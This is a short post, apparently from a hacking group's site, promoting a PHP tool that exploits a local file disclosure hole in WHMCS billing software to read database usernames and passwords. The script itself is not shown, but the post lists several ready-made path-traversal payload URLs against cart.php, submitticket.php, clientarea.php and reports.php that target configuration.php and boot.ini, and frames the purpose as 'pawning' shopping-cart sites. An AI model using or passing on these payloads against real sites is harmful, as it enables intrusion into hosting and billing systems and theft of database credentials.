PHP and Website Security ProjectX

ProjectX WHMCS Exploit Tool

Local File Disclosure

We decided to stop the project, “WHMCS LFD Exploiter” and decided to make a modification out of it in PHP. The function is still the same because it still gets the db_username and the db_password but what has been changed is that it is user friendly and allows the user to change and the payload.

WHCMS Exploit Tool
Pawning a Carting Site

Here is the full script:

Payloads that may come in handy:

cart.php?a=projectx&templatefile=../../../configuration.php”
clients/cart.php?a=projectx&templatefile=../../../configuration.php”
submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.ini
clientarea.php?action=projectx&templatefile=../../configuration.php
reports.php?report=../../../../../../../boot.ini

For more information about this exploit check my previous article about it.